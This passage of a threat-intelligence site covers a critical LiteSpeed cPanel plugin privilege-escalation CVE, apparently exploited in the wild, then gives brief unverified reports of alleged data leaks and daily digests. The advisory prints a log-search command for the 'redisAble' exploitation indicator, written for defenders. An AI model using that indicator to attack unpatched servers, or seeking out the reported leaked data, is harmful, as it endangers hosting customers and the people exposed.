[\[VulDB\]](https://vuldb.com/vuln/364981). LiteSpeed’s release log shows multiple security-focused updates on May 20 and May 21, 2026, including the reintroduction and hardening of Redis features in cPanel plugin v2.4.6 and additional security hardening in cPanel User-End Plugin v2.4.7 bundled with WHM Plugin v5.3.1.0 [\[LiteSpeed Release Log\]](https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/release-log). CVE ID CVE-2026-48172 CVSS Score 10.0 - Critical Vulnerability Type Privilege Escalation Attack Surface cPanel User-End Plugin Affected Product LiteSpeed User-End cPanel Plugin Affected Versions Before 2.4.5 Exploitation Status Exploited in the Wild Primary Feature Area Redis Enable / Disable Potential Impact Root-Level Compromise Minimum Fix Noted by NVD 2.4.7 Recommended WHM Bundle WHM Plugin 5.3.1.0 Disclosure Window May 2026 ## Technical Details The issue is tied to LiteSpeed’s cPanel-side Redis handling. NVD describes exploitation detection around requests containing cpanel\_jsonapi\_func=redisAble, and states that the vulnerability stems from mishandling of Redis enable and disable features [\[NVD\]](https://nvd.nist.gov/vuln/detail/CVE-2026-48172). The practical concern is that a web-hosting server running the vulnerable User-End cPanel Plugin may allow a lower-privileged cPanel user or compromised cPanel account to escalate privileges. VulDB classifies the issue as a privilege assignment vulnerability and maps the weakness to CWE-266, describing impact across confidentiality, integrity, and availability [\[VulDB\]](https://vuldb.com/vuln/364981). Why Hosting Providers Should Prioritize This This is not a normal single-site web application bug. On shared or reseller hosting infrastructure, one compromised cPanel account can become a wider server-risk event if the vulnerable LiteSpeed User-End plugin is present. Any confirmed hit should be treated as potential server compromise, not just plugin abuse. ## Affected Versions NVD lists the affected product as **LiteSpeed User-End cPanel Plugin before 2.4.5**. It also notes that the **LiteSpeed WHM Plugin**, described as the parent plugin, is unaffected by the CVE itself. However, LiteSpeed’s later release log shows additional hardening in the WHM Plugin and cPanel plugin bundle, with **WHM Plugin v5.3.1.0** bundled with **cPanel User-End Plugin v2.4.7** on May 21, 2026 [\[NVD\]](https://nvd.nist.gov/vuln/detail/CVE-2026-48172) [\[LiteSpeed Release Log\]](https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/release-log). | Component | Version | Status | Notes | | ------------------------------------ | ------------ | ------------------- | -------------------------------------------------------------------------------------- | | **LiteSpeed User-End cPanel Plugin** | Before 2.4.5 | Affected | Listed by NVD as vulnerable to privilege escalation. | | cPanel User-End Plugin | 2.4.5 | Initial Fix Level | NVD describes versions before 2.4.5 as affected. | | cPanel User-End Plugin | 2.4.6 | Hardened | LiteSpeed release log says Redis features were reintroduced with additional hardening. | | cPanel User-End Plugin | 2.4.7 | Recommended Minimum | NVD notes 2.4.7 as the recommended minimum version. | | WHM Plugin | 5.3.1.0 | Updated Bundle | Bundled with cPanel User-End Plugin v2.4.7. | cPanel User-End Plugin < 2.4.5 cPanel Plugin 2.4.5 cPanel Plugin 2.4.6 cPanel Plugin 2.4.7 WHM Plugin 5.3.1.0 ## Detection Guidance NVD provides a direct log-search approach for identifying potential exploitation attempts. Administrators can scan cPanel-related logs for the Redis API function indicator using the following Bash command [\[NVD\]](https://nvd.nist.gov/vuln/detail/CVE-2026-48172): grep -rE "cpanel\_jsonapi\_func=redisAble" /var/cpanel/logs /usr/local/cpanel/logs/ 2>/dev/null Interpreting Results If the command returns no output, NVD indicates that the server has not been hit by exploitation matching this indicator. If output appears, administrators should examine the listed IP addresses, determine whether they are valid, block unauthorized sources, and review system logs for follow-on activity from those IPs. ## Potential Impact Successful exploitation can result in privilege escalation on the affected server, potentially reaching root-level access. In a hosting environment, that can create a high-impact compromise scenario involving customer data exposure, service tampering, malware deployment, persistence, or lateral movement from a compromised hosting node. | Impact Area | Risk | | -------------- | ------------------------------------------------------------------------------------------------ | | Server Control | Possible root-level compromise on affected systems. | | Customer Sites | Potential tampering, data theft, defacement, or malware staging across hosted accounts. | | Credentials | Exposure risk for configuration files, database credentials, API keys, and local secrets. | | Persistence | Attackers may attempt to create backdoors, cron jobs, webshells, or additional privileged users. | ## Recommendations 1. **Upgrade immediately.** Move to at least **cPanel User-End Plugin v2.4.7** and **WHM Plugin v5.3.1.0**, which LiteSpeed lists as the May 21, 2026 security release bundle [\[LiteSpeed Release Log\]](https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/release-log). 2. **Search for exploitation indicators.**Run the NVD-provided grep command across the cPanel log directories to identify possible redisAble exploitation attempts. grep -rE "cpanel\_jsonapi\_func=redisAble" /var/cpanel/logs /usr/local/cpanel/logs/ 2>/dev/null 3. **Investigate any matching IP addresses.** If the detection command returns output, validate the source IPs, block unauthorized sources, and review system logs for post-exploitation activity. 4. **Review server integrity.** Check for unexpected privileged users, suspicious cron entries, modified binaries, unfamiliar SSH keys, new webshells, and unusual outbound connections. 5. **Rotate exposed secrets if compromise is suspected.** Treat hosting-panel credentials, database passwords, API keys, and local service tokens as potentially exposed if exploitation is confirmed. 6. **Limit cPanel and WHM exposure.** Restrict administrative interfaces to trusted IP ranges, VPN, or Zero Trust access where possible. ## Context LiteSpeed’s May 2026 control-panel plugin updates show a rapid sequence of security changes around the affected cPanel and WHM plugin bundle. On May 20, LiteSpeed released WHM Plugin v5.3.0.0 bundled with cPanel plugin v2.4.6, noting that Redis features were reintroduced with additional security hardening. On May 21, LiteSpeed released WHM Plugin v5.3.1.0 bundled with cPanel User-End Plugin v2.4.7, adding multiple additional security hardening items including adminbin caller-trust validation, safer command execution handling, and defaulting cPanel plugin auto-install to off on fresh installations [\[LiteSpeed Release Log\]](https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/release-log). Because NVD describes CVE-2026-48172 as exploited in the wild and potentially leading to root-level privilege escalation, hosting providers and server administrators should treat vulnerable LiteSpeed User-End cPanel Plugin deployments as urgent patch-and-hunt priorities rather than routine maintenance [\[NVD\]](https://nvd.nist.gov/vuln/detail/CVE-2026-48172). ## Bottom Line **CVE-2026-48172 is a critical LiteSpeed User-End cPanel Plugin privilege-escalation issue with reported in-the-wild exploitation.** Any server running affected plugin versions should be upgraded immediately, checked for redisAble indicators in cPanel logs, and reviewed for signs of root-level compromise. ### Hillpointe Allegedly Targeted: 2.5M U.S. Housing Development Customer and Employee Records Leaked URL: https://darkwebinformer.com/hillpointe-allegedly-targeted-2-5m-u-s-housing-development-customer-and-employee-records-leaked/ Last updated: 2026-05-22T17:35:36.000Z Breach Report · United States # Hillpointe Allegedly Targeted: 2.5M U.S. Housing Development Customer and Employee Records Leaked A threat actor on an underground forum is claiming to leak customer and employee data allegedly belonging to Hillpointe, a U.S. housing development and property management company. The actor claims the dataset contains 2,516,271 CSV records across 81 files, totaling roughly 319MB. ## ▣Post details TargetHillpointe CountryUnited States 🇺🇸 SectorHousing Development / Real Estate / Property Management ActorzSenior ClaimCustomer and employee database leak Exposure2,516,271 CSV records / 81 files / 319MB PriceNot stated ObservedMay 21, 2026 ## !What is allegedly exposed - Names - Email addresses - Phone numbers - Mailing addresses - Employment details - Employee records - Candidate email and phone records - Candidate mailing address records - Interview Q&A data - CSV file tree records ## ◎Screenshots [ ![Hillpointe alleged database leak screenshot showing employee CSV sample](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/29873598273569872365987233.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/29873598273569872365987233.png) [ ![Hillpointe alleged database leak screenshot showing candidate records and file tree preview](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/29873598273569872365987234.png) Screenshot 2 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/29873598273569872365987234.png) ## ⚠Potential impact The exposed information could be used for phishing, identity fraud, candidate impersonation, employment-related social engineering, real estate scams, and targeted attacks against customers, applicants, employees, and business contacts. ## iStatus Unverified underground forum claim. The listing includes CSV samples and a file tree preview, but the exposure has not been independently confirmed. Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. darkwebinformer.com/pricing ### Daily Dose of Dark Web Informer - May 21st, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-may-21st-2026/ Last updated: 2026-05-21T22:16:12.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience. [ View details](https://darkwebinformer.com/advertising) 56.2k Unique Visitors 122.1k Pageviews Last 30 days as of May 11, 2026\. Next update June 11th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources ## 🧾 Today's Intelligence Threat Intelligence ❗️ [Mexican Citizenship Document Service Advertised on Underground Forum](https://darkwebinformer.com/mexican-citizenship-document-service-advertised-on-underground-forum/) FREE ❗️ [ATOA Allegedly Exposed: 23,685 Fintech Records and 326 KYC Document Archives](https://darkwebinformer.com/atoa-allegedly-exposed-23-685-fintech-records-and-326-kyc-document-archives/) FREE X/Twitter Updates ❗️ [🇨🇦 Happipad | Alleged Customer Database Exposure](https://x.com/DarkWebInformer/status/2057474674905198789?s=20) ❗️ [Yikes](https://x.com/DarkWebInformer/status/2057478211974406618?s=20) 💡 [CVE Lite CLI: Vulnerability scanning that belongs in your terminal, not your CI pipeline. Scan your lockfile, get copy-and-run fix commands, and ship clean code.](https://x.com/DarkWebInformer/status/2057484468537925725?s=20) ❗️ [🇰🇼 Kuwait Central Statistical Bureau | Alleged Citizen Database Leak](https://x.com/DarkWebInformer/status/2057488138558153153?s=20) ❗️ [CVE-2026-0300: PAN-OS: Unauthenticated user initiated Buffer Overflow Vulnerability in User-ID Authentication Portal](https://x.com/DarkWebInformer/status/2057494286376083734?s=20) ❗️ [🇦🇺 The Shepparton Adviser, the largest circulating and privately-owned free newspaper in the Goulburn and Murray Valley regions of Victoria, Australia has been claimed a victim to BrainCipher Ransomware](https://x.com/DarkWebInformer/status/2057506210614485254?s=20) ❗️ [The Gentlemen Ransomware Claims 3 New Victims](https://x.com/DarkWebInformer/status/2057507833705295977?s=20) ❗️ [Payload Ransomware Claims 4 New Victims](https://x.com/DarkWebInformer/status/2057510239721722121?s=20) ❗️ [The FBI has issued a FLASH advisory warning that ransomware groups are using First VPN Service to conduct network reconnaissance and carry out computer intrusions. Promoted on criminal forums, First VPN is reportedly leveraged to support botnets, DDoS attacks, hacking operations,](https://x.com/DarkWebInformer/status/2057523244689998087?s=20) ❗️ [Qilin Ransomware Claims 2 New Victims](https://x.com/DarkWebInformer/status/2057539799888928897?s=20) ❗️ [Multiple users are reporting that Kash Patel’s apparel site is serving a ClickFix-style malware lure.](https://x.com/DarkWebInformer/status/2057542704398053617?s=20) ❗️ [🇫🇷 Almerys | Alleged Dataset Exposure](https://x.com/DarkWebInformer/status/2057553535848284602?s=20) ❗️ [The FBI has issued a Public Service Announcement warning about Kali365, an emerging Phishing-as-a-Service platform first observed in April 2026.](https://x.com/DarkWebInformer/status/2057568811235316168?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### ATOA allegedly exposed: 23,685 fintech records and 326 KYC document archives URL: https://darkwebinformer.com/atoa-allegedly-exposed-23-685-fintech-records-and-326-kyc-document-archives/ Last updated: 2026-05-21T20:28:20.000Z Alleged Database Exposure - France # ATOA allegedly exposed: 23,685 fintech records and 326 KYC document archives ATOA has been named in a forum leak post involving an alleged database exposure with user, wallet, transaction, instalment, KYC, contact, and invoice records. The actor claims the dataset includes 23,685 tabular records and 326 KYC document archives. ## Post details TargetATOA CountryFrance SectorFintech / Payments / KYC Data IncidentDatabase Leak Exposure23,685 records + 326 KYC document archives Actortabaskoss PriceNot stated Observed21/05/2026 ## Claimed data - User and wallet records - Names, emails, and phone numbers - Home address and nationality fields - Date and place of birth fields - Wallet balance and account status data - IBAN, bank detail, and tax identifier fields - Transaction and instalment records - KYC document archives including passports, ID cards, proof-of-address files, and company registration documents - Invoice and billing records ## Potential impact Because the alleged dataset includes financial, KYC, identity, contact, and billing-related fields, the exposed material could increase risk of phishing, account targeting, payment fraud, identity theft, and social engineering against users, customers, and related business entities. ## Status Unverified underground forum claim. The actor posted a dataset inventory and field breakdown showing multiple record categories and KYC archive counts. ## Screenshots [ ![ATOA alleged database exposure screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/3287959827365987236598723568972.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/3287959827365987236598723568972.png) [ ![ATOA alleged database exposure screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/3287959827365987236598723568973.png) Screenshot 2 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/3287959827365987236598723568973.png) Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing) ### Mexican Citizenship Document Service Advertised on Underground Forum URL: https://darkwebinformer.com/mexican-citizenship-document-service-advertised-on-underground-forum/ Last updated: 2026-05-21T22:17:24.000Z Underground Forum Report · Mexico # Mexican Citizenship Document Service Advertised on Underground Forum A threat actor is advertising an alleged Mexican citizenship and passport document service, claiming to provide officially verified identity documents through in-person collection at government offices. The listing describes a package involving biometric passport, CURP, driver’s license, citizen ID, naturalization certificate, utility bill, and other supporting document claims. ## Post details TargetMexican citizenship and passport document service SectorDocument Fraud / Identity Services TypeUnderground Service Advertisement ExposureNot applicable ActorMexicoPassports CountryMexico Date20/05/2026 ## Claimed services - Biometric passport service claims - CURP registration references - Driver’s license and citizen ID card claims - Naturalization certificate references - Utility bill and address proof document claims - Bank account and exchange registration references - Additional education, company, license, and paperwork-related service claims ## Risk context The advertisement centers on alleged identity-document services rather than a database leak. If credible, this type of offering could support identity fraud, immigration fraud, financial account abuse, impersonation, and related social-engineering activity. ## Verification Unverified underground forum advertisement. The actor claims the service involves identity document support and government-office collection, with contact handled through Telegram. ## Screenshots [ ![Forum screenshot showing Mexican citizenship document service advertisement](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/23957862983756928735698723568972351.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/23957862983756928735698723568972351.png) Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing) ### Perumda Tirta Musi Palembang Alleged Customer Database Sale: 437K+ Utility Records Advertised URL: https://darkwebinformer.com/perumda-tirta-musi-palembang-alleged-customer-database-sale-437k-utility-records-advertised/ Last updated: 2026-05-20T20:28:09.000Z Alleged Database Sale · Indonesia # Perumda Tirta Musi Palembang Alleged Customer Database Sale: 437K+ Utility Records Advertised Perumda Tirta Musi Palembang has been named in a forum sale listing involving an alleged water utility customer database exposure. The actor claims the dataset includes 437K+ customer records and 257K phone numbers tied to the Palembang city-owned water provider. ## Post details TargetPerumda Tirta Musi Palembang SectorWater Utility / Public Services TypeCustomer Database Sale Records437K+ customer records and 257K phone numbers ActorSorb CountryIndonesia Price$300 Date20/05/2026 ## Claimed data - Customer names - Address fields - Telephone number fields - Tariff code data - Meter and water account references - Customer status and service metadata - CSV-formatted utility customer records ## Potential impact The exposed data could be used for phishing, utility-billing scams, customer impersonation, targeted social engineering, and fraud attempts against Palembang water utility customers. ## Status Unverified underground forum claim. The actor posted sample utility customer records and claims the full dataset is being offered for sale. ## Screenshots [ ![Perumda Tirta Musi Palembang alleged customer database sale forum screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/78239560987236587962359872987.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/78239560987236587962359872987.png) Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing) ### Uruguay DNIC allegedly leaked: 5.8M citizen database records exposed URL: https://darkwebinformer.com/uruguay-dnic-allegedly-leaked-5-8m-citizen-database-records-exposed/ Last updated: 2026-05-20T15:55:43.000Z Database Leak · Uruguay # Uruguay DNIC allegedly leaked: 5.8M citizen database records exposed A forum actor claims to have shared a Uruguay DNIC citizen database containing more than 5.8 million records. The post alleges the dataset includes citizen identity numbers, first names, surnames, and related citizen records, and describes the leak as a free release after allegedly circulating in closed Telegram groups. Post details ActorLaPampaLeaks SectorGovernment / Citizen Identity Records TypeDatabase Leak Records5.8M citizen records CountryUruguay Date17/05/2026 What’s allegedly included - DNIC-linked citizen database records allegedly tied to Uruguay - Cédula de identidad / national ID number fields - Citizen first name and surname fields - Database preview showing structured citizen records - Hidden forum download content allegedly containing the full database - Actor commentary claiming the data had circulated in closed Telegram groups Potential impact The exposed data could be used for identity theft, phishing, citizen impersonation, account recovery abuse, document fraud, and targeted social engineering against Uruguayan residents. Status Unverified underground forum claim. The actor posted a database preview and claims hidden download content contains the full Uruguay citizen database. Screenshots [![Uruguay DNIC leak forum screenshot placeholder 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/1237985298375698273569872351.png)Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/1237985298375698273569872351.png) [![Uruguay DNIC database sample screenshot placeholder 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/1237985298375698273569872352.png)Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/1237985298375698273569872352.png) Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. darkwebinformer.com/pricing ### Canada Beauty Salon database shared: 1M+ business lead records posted from beauty and cosmetics sector URL: https://darkwebinformer.com/canada-beauty-salon-database-shared-1m-business-lead-records-posted-from-beauty-and-cosmetics-sector/ Last updated: 2026-05-19T17:49:25.000Z Database Share Report · Canada / International # Canada Beauty Salon database shared: 1M+ business lead records posted from beauty and cosmetics sector A forum user claims to have shared a large business lead database focused on beauty salons, cosmetics businesses, and related personal care services across Canada and international regions. ## Post details TargetCanada Beauty Salon Business Leads ActorVyntra SectorBeauty / Cosmetics / B2B Marketing TypeDatabase Share Records1M+ records CountryCanada / International PriceFree Date17/05/2026 ## What’s allegedly included - Business names and category or industry fields - Phone number records - Website links and business profile references - Email address fields - Country and city fields - Full business address information - Beauty, salon, cosmetic, massage, tanning, and healthcare service categories - Sample business lead records shared as proof ## Potential impact The exposed business lead data could be used for spam campaigns, unsolicited outreach, phishing, business impersonation, and targeted scams against beauty and personal care businesses. ## Status Unverified underground forum post. The actor describes the dataset as a free database containing more than 1M verified beauty and cosmetics business leads, with hidden download content behind forum access. ## Screenshots [ ![Canada Beauty Salon business lead database forum screenshot showing listing details](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9237856298376589723648972635987236.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9237856298376589723648972635987236.png) [ ![Canada Beauty Salon sample database records screenshot from underground forum post](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9237856298376589723648972635987237.png) Screenshot 2 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9237856298376589723648972635987237.png) Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing) ### Watiqa.ma allegedly breached: 695K Moroccan civil document platform records exposed URL: https://darkwebinformer.com/watiqa-ma-allegedly-breached-695k-moroccan-civil-document-platform-records-exposed/ Last updated: 2026-05-19T15:39:01.000Z Database Leak Report · Morocco # Watiqa.ma allegedly breached: 695K Moroccan civil document platform records exposed A threat actor claims to have leaked a full database dump tied to Watiqa.ma, Morocco’s government electronic platform for requesting civil status documents. ## Post details TargetWatiqa.ma Actormacaroni SectorGovernment / Civil Records / Digital Public Services TypeDatabase Leak Records695,402 records CountryMorocco PriceNot stated Date19/05/2026 ## What’s allegedly included - Civil document request records allegedly linked to Watiqa.ma - Full names and family relationship fields - Parent name fields - Birth date and birth certificate-related references - Email, phone, and residential address fields - Civil registry office and bureau-related metadata - User role, profile, and administrative account references - CSV archive allegedly originating from the official government platform ## Potential impact The exposed data could be used for identity theft, document fraud, phishing, impersonation, and targeted social engineering against Moroccan citizens and public-sector users. ## Status Unverified underground forum claim. The actor posted CSV samples and claims the thread will be updated if additional files are published. ## Screenshots [ ![Watiqa.ma alleged database leak forum screenshot showing listing details](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9789236589726349876239587623875947892.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9789236589726349876239587623875947892.png) [ ![Watiqa.ma alleged CSV sample screenshot from underground forum post](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9789236589726349876239587623875947893.png) Screenshot 2 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9789236589726349876239587623875947893.png) Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing) ### Nirvasa allegedly breached: 3.5K healthcare platform user records advertised for sale URL: https://darkwebinformer.com/nirvasa-allegedly-breached-3-5k-healthcare-platform-user-records-advertised-for-sale/ Last updated: 2026-05-19T15:39:09.000Z Data Leak Report · India # Nirvasa allegedly breached: 3.5K healthcare platform user records advertised for sale A threat actor claims to be selling data tied to Nirvasa, an Indian digital healthcare platform focused on primary care, personalized treatment, and patient services. ## Post details TargetNirvasa ActorMasterbyte SectorHealthcare / Digital Health / Patient Services TypeData Leak / Data Sale Records3.5K user records CountryIndia Price$600 Date19/05/2026 ## What’s allegedly included - User records allegedly linked to Nirvasa - First name and last name fields - Telephone number fields - Email ID fields - PIN code and address information - API and offer-related metadata - Visitor and appointment/service-related timestamps ## Potential impact The exposed data could be used for phishing, healthcare impersonation, patient scams, identity theft, and targeted social engineering against Nirvasa users. ## Status Unverified underground forum sale listing. The actor posted structured sample records and claims the data was relevant for 2024–2026. ## Screenshots [ ![Nirvasa alleged data sale forum screenshot showing listing details](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/82375896239875698273568972341.png) Screenshot 1 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/82375896239875698273568972341.png) [ ![Nirvasa alleged sample records screenshot from underground forum post](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/82375896239875698273568972342.png) Screenshot 2 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/82375896239875698273568972342.png) Want the non-blurred screenshots? Subscribe and check out the threat feed or ransomware feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing) ### Daily Dose of Dark Web Informer - May 18th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-may-18th-2026/ Last updated: 2026-05-18T21:49:24.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience. [ View details](https://darkwebinformer.com/advertising) 56.2k Unique Visitors 122.1k Pageviews Last 30 days as of May 11, 2026\. Next update June 11th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources ## 🧾 Today's Intelligence Threat Intelligence ❗️ [Perm National Research Polytechnic University Allegedly Breached: 362K Internal Student Research System Records Leaked](https://darkwebinformer.com/perm-national-research-polytechnic-university-allegedly-breached-362k-internal-student-research-system-records-leaked/) FREE ❗️ [DPMPTSP Kabupaten Belu Allegedly Breached: 12.3K+ Business Licensing and Investment Service Records Leaked](https://darkwebinformer.com/dpmptsp-kabupaten-belu-allegedly-breached-12-3k-business-licensing-and-investment-service-records-leaked/) FREE ❗️ [Indonesian LSP Certification Databases Allegedly Leaked: 20+ Professional Certification Institute Datasets Exposed](https://darkwebinformer.com/indonesian-lsp-certification-databases-allegedly-leaked-20-professional-certification-institute-datasets-exposed/) FREE X/Twitter Updates ❗️ [Google-signed SMTP mailer allegedly advertised: Gmail relay-based mailer service promoted on underground forum](https://x.com/DarkWebInformer/status/2056384406848184428?s=20) ❗️ [XIA Stealer advertised: DLL-based information stealer promoted as “fully undetected” on underground forum](https://x.com/DarkWebInformer/status/2056387802716070080?s=20) ❗️ [🇫🇷 ManoMano allegedly breached: 38.7M user and ticket records advertised for sale from home improvement marketplace database](https://x.com/DarkWebInformer/status/2056391312371294397?s=20) 💡 [The API daily limit has been changed from 50 requests daily to 150 requests. This has been reflected on the necessary pages.](https://x.com/DarkWebInformer/status/2056396122969481727?s=20) ❗️ [🇺🇸 Venture Yours allegedly breached: 70K vacation rental management files and KYC/PII records exposed](https://x.com/DarkWebInformer/status/2056397973060190677?s=20) 💡 [.@zachxbt is offering another $10,000 bounty for credible intelligence on the Hong Kong market maker Heisenberg Guru, also known as HSBG, allegedly linked to multiple CEX market manipulation incidents, including $RIVER.](https://x.com/DarkWebInformer/status/2056399998049194194?s=20) ❗️ [ Beyond The Dark on Steam is malware, don't download it... or download it if you want malware... but really don't download it!](https://x.com/DarkWebInformer/status/2056432660961022294?s=20) ❗️ [ New Ransomware group being monitored: Titan](https://x.com/DarkWebInformer/status/2056439354927595783?s=20) ❗️ [🇫🇷 MediaVacances allegedly breached: 256K invoice and holiday rental records exposed from French vacation booking platform](https://x.com/DarkWebInformer/status/2056449391347871923?s=20) 💡 [GitHub Advisories feed was updated with the following and is currently for Elite subscribers only:](https://x.com/DarkWebInformer/status/2056455440574157114?s=20) 💡 [Pentest Agent Suite for Claude Code: Autonomous bug-bounty framework for Claude Code and 6 other AI coding tools - 50 agents, 26 commands, 19 CLI tools, 11 skills, 2 MCP servers.](https://x.com/DarkWebInformer/status/2056469586724221262?s=20) ❗️ [PF onion is having some issues right now.](https://x.com/DarkWebInformer/status/2056477486225961053?s=20) 💡 [Lul...](https://x.com/DarkWebInformer/status/2056479796209631536?s=20) ❗️ [YellowKey PoC Demo to Bypass Bitlocker](https://x.com/DarkWebInformer/status/2056483411548680498?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Indonesian LSP Certification Databases Allegedly Leaked: 20+ Professional Certification Institute Datasets Exposed URL: https://darkwebinformer.com/indonesian-lsp-certification-databases-allegedly-leaked-20-professional-certification-institute-datasets-exposed/ Last updated: 2026-05-18T18:50:11.000Z Breach Report · Indonesia # Indonesian LSP Certification Databases Allegedly Leaked: 20+ Professional Certification Institute Datasets Exposed A threat actor claims to be publishing additional databases tied to Indonesian Professional Certification Institutes (LSP), alleging that more than 20 LSP datasets have been obtained and are being released as part of an ongoing extortion-driven leak campaign. Post details Actor\[Citizen\] Kyyza SectorProfessional Certification / Education / Workforce Credentials TypeDatabase Leak / Extortion Leak Records20+ LSP databases CountryIndonesia Date18/05/2026 Compromised data - Certification participant and assessee records - Registration numbers and certification-related identifiers - Names, birthplaces, birth dates, ages, and email fields - Phone number and national identity number fields - Profession, education level, and citizenship-related fields - Payment, bank account, and transaction-related records - SQL database files tied to multiple LSP entities - Sample database tables and structured records shared as proof Potential impact The exposed data could be used for identity theft, phishing, credential fraud, financial scams, and targeted social engineering against certification participants, staff, and Indonesian LSP organizations. Status Unverified underground forum claim. The actor posted database file previews and SQL samples, stating that additional LSP datasets will continue to be published. Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/9327859239876839475692873569786235487934.png) Screenshot 1 